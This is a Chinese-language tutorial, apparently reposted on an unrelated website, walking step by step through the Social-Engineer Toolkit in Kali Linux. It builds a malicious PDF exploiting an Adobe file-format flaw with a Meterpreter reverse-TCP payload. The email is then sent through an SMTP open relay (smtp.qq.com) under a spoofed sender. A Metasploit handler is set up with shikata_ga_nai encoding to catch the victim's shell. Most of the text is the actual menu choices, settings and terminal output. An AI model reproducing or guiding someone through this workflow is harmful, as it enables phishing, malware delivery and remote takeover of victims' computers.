使用SET工具包发送钓鱼邮件 |
您所在的位置:网站首页 › kali社会工程工具包 › 使用SET工具包发送钓鱼邮件 |
|
本文简单详细介绍了使用kali社会工程学工具包对目标单位进行多方面渗透测试 配置SET工具包可以使用系统自带的set包,也可以更新到最新版本的,更新命令(建议备份好本地set) ┌──(root💀kali)-[/usr/share] └─# git clone https://github.com/trustedsec/social-engineer-toolkit.git set 针对性钓鱼攻击向量通过特殊构造的文件格式漏洞进行渗透攻击,本文例子为Adobe PDF漏洞 客户端输入setoolkit进入工具包 setoolkit . .. MMMMMNMNMMMM= .DMM. .MM$ .MM. MM,. MN. MM. .M. MM .M ..................... NM MM .8888888888888888888. M7 .M 88888888888888888888. ,M MM ..888.MMMMM . .M. MM 888.MMMMMMMMMMM M MM 888.MMMMMMMMMMM. M MM 888. NMMMM. .M M. 888.MMMMMMMMMMM. ZM NM. 888.MMMMMMMMMMM M: .M+ ..... MM. .MM. .MD MM . .MM $MM .MM. ,MM? .MMM ,MMMMMMMMMMM https://www.trustedsec.com [---] The Social-Engineer Toolkit (SET) [---] [---] Created by: David Kennedy (ReL1K) [---] Version: 8.0.3 Codename: 'Maverick' [---] Follow us on Twitter: @TrustedSec [---] [---] Follow me on Twitter: @HackingDave [---] [---] Homepage: https://www.trustedsec.com [---] Welcome to the Social-Engineer Toolkit (SET). The one stop shop for all of your SE needs. The Social-Engineer Toolkit is a product of TrustedSec. Visit: https://www.trustedsec.com It's easy to update using the PenTesters Framework! (PTF) Visit https://github.com/trustedsec/ptf to update all your tools! Select from the menu: 1) Social-Engineering Attacks 2) Penetration Testing (Fast-Track) 3) Third Party Modules 4) Update the Social-Engineer Toolkit 5) Update SET configuration 6) Help, Credits, and About 99) Exit the Social-Engineer Toolkit set>进入画面如上 接下来依次按1,1,1,10,2进入如下面板 1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker 2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker 3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker 4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline 5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter 6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system 7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter set:payloads>2 set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.1.113]:接着输入监听ip和端口,按回车默认输入,进入如下 set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.1.113]: set:payloads> Port to connect back on [443]: [-] Defaulting to port 443... [*] All good! The directories were created. [-] Generating fileformat exploit... [*] Waiting for payload generation to complete (be patient, takes a bit)... [*] Waiting for payload generation to complete (be patient, takes a bit)... [*] Waiting for payload generation to complete (be patient, takes a bit)... [*] Waiting for payload generation to complete (be patient, takes a bit)... [*] Waiting for payload generation to complete (be patient, takes a bit)... [*] Waiting for payload generation to complete (be patient, takes a bit)... [*] Payload creation complete. [*] All payloads get sent to the template.pdf directory [*] If you are using GMAIL - you will need to need to create an application password: https://support.google.com/accounts/answer/6010255?hl=en [-] As an added bonus, use the file-format creator in SET to create your attachment. Right now the attachment will be imported with filename of 'template.whatever' Do you want to rename the file? example Enter the new filename: moo.pdf 1. Keep the filename, I don't care. 2. Rename the file, I want to be cool. set:phishing>2 set:phishing> New filename:metasploit_set [*] Filename changed, moving on... Social Engineer Toolkit Mass E-Mailer There are two options on the mass e-mailer, the first would be to send an email to one individual person. The second option will allow you to import a list and send it to as many people as you want within that list. What do you want to do: 1. E-Mail Attack Single Email Address 2. E-Mail Attack Mass Mailer 99. Return to main menu. set:phishing>接着依次选择1,1,5进入如下面板 set:phishing> Send email to:[email protected] 1. Use a gmail Account for your email attack. 2. Use your own server or open relay set:phishing>2 set:phishing> From address (ex: [email protected]):[email protected] set:phishing> The FROM NAME user will see:metasploit set:phishing> Username for open-relay [blank]:234 Password for open-relay [blank]: set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):smtp.qq.com set:phishing> Port number for the SMTP server [25]: set:phishing> Flag this message/s as high priority? [yes|no]:no set:phishing> Does your server support TLS? [yes|no]:no [*] SET has finished delivering the emails set:phishing> Setup a listener [yes|no]:yes [!] The following modules could not be loaded!..| [!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go [!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go [!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go [!] Please see /root/.msf4/logs/framework.log for details. _ _ / \ /\ __ _ __ /_/ __ | |\ / | _____ \ \ ___ _____ | | / \ _ \ \ | | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| |_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ |/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\ =[ metasploit v6.0.43-dev ] + -- --=[ 2129 exploits - 1137 auxiliary - 363 post ] + -- --=[ 596 payloads - 45 encoders - 10 nops ] + -- --=[ 8 evasion ] Metasploit tip: View all productivity tips with the tips command [*] Processing /root/.set//meta_config for ERB directives. resource (/root/.set//meta_config)> use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp resource (/root/.set//meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (/root/.set//meta_config)> set LHOST 192.168.1.113 LHOST => 192.168.1.113 resource (/root/.set//meta_config)> set LPORT 443 LPORT => 443 resource (/root/.set//meta_config)> set ENCODING shikata_ga_nai ENCODING => shikata_ga_nai resource (/root/.set//meta_config)> set ExitOnSession false ExitOnSession => false resource (/root/.set//meta_config)> exploit -j [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.1.113:443 msf6 exploit(multi/handler) > [*] Sendin可以看到,当我们设置好参数后,set工具包会自动打开metasploit服务并设置好参数,等待目标上钩 |
今日新闻 |
推荐新闻 |
| CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |